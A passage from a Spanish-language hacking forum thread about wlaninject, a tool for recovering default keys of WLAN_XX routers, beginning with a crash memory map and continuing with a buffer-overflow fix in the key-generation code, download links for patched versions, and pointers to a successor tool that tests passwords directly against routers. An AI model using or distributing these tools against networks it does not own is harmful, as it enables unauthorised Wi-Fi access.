b7f8f000-b7fb3000 r-xp 00000000 08:12 156110     /lib/tls/i686/cmov/libm-2.8.90.so
b7fb3000-b7fb4000 r--p 00023000 08:12 156110     /lib/tls/i686/cmov/libm-2.8.90.so
b7fb4000-b7fb5000 rw-p 00024000 08:12 156110     /lib/tls/i686/cmov/libm-2.8.90.so
b7fb5000-b7fdd000 r-xp 00000000 08:12 137163     /lib/libpcre.so.3.12.1
b7fdd000-b7fde000 r--p 00027000 08:12 137163     /lib/libpcre.so.3.12.1
b7fde000-b7fdf000 rw-p 00028000 08:12 137163     /lib/libpcre.so.3.12.1
b7fdf000-b7fe0000 rw-p b7fdf000 00:00 0
b7fe0000-b8009000 r-xp 00000000 08:12 277109     /usr/lib/libpcap.so.0.9.8
b8009000-b800a000 r--p 00028000 08:12 277109     /usr/lib/libpcap.so.0.9.8
b800a000-b800b000 rw-p 00029000 08:12 277109     /usr/lib/libpcap.so.0.9.8
b800b000-b801e000 r-xp 00000000 08:12 278007     /usr/lib/libnet.so.1.3.0
b801e000-b801f000 rw-p 00013000 08:12 278007     /usr/lib/libnet.so.1.3.0
b801f000-b8020000 rw-p b801f000 00:00 0
b8021000-b802e000 r-xp 00000000 08:12 137119     /lib/libgcc_s.so.1
b802e000-b802f000 r--p 0000c000 08:12 137119     /lib/libgcc_s.so.1
b802f000-b8030000 rw-p 0000d000 08:12 137119     /lib/libgcc_s.so.1
b8030000-b8033000 rw-p b8030000 00:00 0
b8033000-b804d000 r-xp 00000000 08:12 137308     /lib/ld-2.8.90.so
b804d000-b804e000 r-xp b804d000 00:00 0          [vdso]
b804e000-b804f000 r--p 0001a000 08:12 137308     /lib/ld-2.8.90.so
b804f000-b8050000 rw-p 0001b000 08:12 137308     /lib/ld-2.8.90.so
bfc3b000-bfc50000 rw-p bffeb000 00:00 0          [stack]
Cancelado

Cualquier ayuda es bienvenida


Título: Re: Wlaninject 0.6 - Ahora con cafeina, mucho más rapido!!
Publicado por: VTCop en 3 Mayo 2009, 10:52 am
Ok, ya he encontrado el otro fallo en el código.
Es similar al anterior, por no guardar un caracter para el fin de cadena.
Esta vez es en la línea 820, en la variable clave (fichero wlaninject.c)
Código:
char clave[15];
Debería ser:
Código:
char clave[16];
Para que cuando en la línea 1020 ejecutemos
Código:
sprintf(clave, "s:%s%c%c%c%c%c%c", routers[bssidId].init[indice], hex[i],hex[j],hex[k],hex[l],endKey[0],endKey[1]);
No produzca otro overflow.

Ahora ya me funciona en Ubuntu a la perfección, y con los nuevos drivers de mi Intel 3945, los iwl3945 version 1.2.26ks, ya puedo utilizar wlaninject con una única tarjeta !!! Creando dos interfaces, mon0 para monitor y wlan0 para managed !!!! Cosa que con la Atheros AR5212 no conseguía: Creaba las interfaces y lanzaba aireplay y wlaninject, pero no consguía el preciado paquete.


Título: Re: Wlaninject 0.6 - Ahora con cafeina, mucho más rapido!!
Publicado por: VTCop en 3 Mayo 2009, 11:44 am
Bueno pues ya está.
Aquí os dejo la versión 0.7 rc4 de wlaninject con esos dos fallitos que os he comentado corregidos y con todos los routers actualizados (con los mismos que trae wlandecrypter 0.9)

http://www.sofiytommy.com/wifi/wlaninject-0.7rc4-actualizado.tar.gz (http://www.sofiytommy.com/wifi/wlaninject-0.7rc4-actualizado.tar.gz)

Un saludo



Título: Re: Wlaninject 0.6 - Ahora con cafeina, mucho más rapido!!
Publicado por: fuenteRea en 3 Mayo 2009, 13:18 pm
Bueno pues ya está.
Aquí os dejo la versión 0.7 rc4 de wlaninject con esos dos fallitos que os he comentado corregidos y con todos los routers actualizados (con los mismos que trae wlandecrypter 0.9)

http://www.sofiytommy.com/wifi/wlaninject-0.7rc4-actualizado.tar.gz (http://www.sofiytommy.com/wifi/wlaninject-0.7rc4-actualizado.tar.gz)

Un saludo



Bien echo, tu podias, jaja, un saludo!!


Título: Re: Wlaninject 0.6 - Ahora con cafeina, mucho más rapido!!
Publicado por: |FluiD| en 3 Mayo 2009, 18:46 pm
Muchas gracias por tu tiempo, me sera muy util.

FluiD


Título: Re: Wlaninject 0.6 - Ahora con cafeina, mucho más rapido!!
Publicado por: ChimoC en 4 Mayo 2009, 10:07 am
Buenas:

VTCop, gracias  ;) ... ya he añadido el link de descarga a la chincheta de wlaninject  ;D

Un saludo

ChimoC


Título: Re: Wlaninject 0.6 - Ahora con cafeina, mucho más rapido!!
Publicado por: alfon6 en 21 Enero 2010, 21:59 pm
Me podriais decir o pasar un manual de como añadir las nuevas MACs WLAN_XX E0:93....  al wlaninject????En la actualidad uso el del Wifiway 1.0 final pero estas son muy nuevas y no vienen.

Gracias de antemano.

Saludos.

Alfon6


Título: Re: Wlaninject 0.6 - Ahora con cafeina, mucho más rapido!!
Publicado por: ChimoC en 22 Enero 2010, 11:37 am
Buenas:

Mira las chinchetas..que yo sepa ya está en el 1.2

Un saludo

ChimoC


Título: Re: Wlaninject 0.6 - Ahora con cafeina, mucho más rapido!!
Publicado por: alfon6 en 22 Enero 2010, 14:32 pm
ChimoC me refiero al Wlaninject, no al Wlandecrypter, son 2 programas diferentes.

Gracias de todas formas.

Saludos.
Alfon6


Título: Re: Wlaninject 0.6 - Ahora con cafeina, mucho más rapido!!
Publicado por: spermatodj en 19 Febrero 2010, 06:40 am
Alguien me puede ayudar probar este metodo en wifislax 31.
Existe alguna manera de hacerlo en wifislax con un rtl8187?.


Título: Re: Wlaninject 0.6 - Ahora con cafeina, mucho más rapido!!
Publicado por: atoriyama en 2 Julio 2010, 10:10 am
vtcop ole que bueno que lo pudieses compilar para ubuntu
lastima que el link se borrara, podrias subir esta compilacion arreglada otra vez porfavor? muchas gracias


Título: Re: Wlaninject 0.6 - Ahora con cafeina, mucho más rapido!!
Publicado por: |FluiD| en 3 Julio 2010, 21:27 pm
UFFfffff mira que hace años que se inicio este post  ;D

La cosa evoluciono a:
http://foro.elhacker.net/wireless_en_linux/wlanreaver_v032_wlanxx_y_jazztelxx_sin_clientes_ni_datas_ni_modo_monitor-t292287.0.html

...y aqui lo tienes testeado por pazienzia y con caputras:
http://foro.seguridadwireless.net/enlaces-descarga-aplicaciones-wireless-linux/wlanreaver-v0-3-2-wlan_xx-y-jazztel_xx-sin-clientes-ni-datas-ni-modo-monitor/

Hecharle un ojo a la ayuda, se puede inyectar y tambien se pueden probar directamente las contraseñas en el router sin necesidad de inyectar.

Saludos

|FluiD|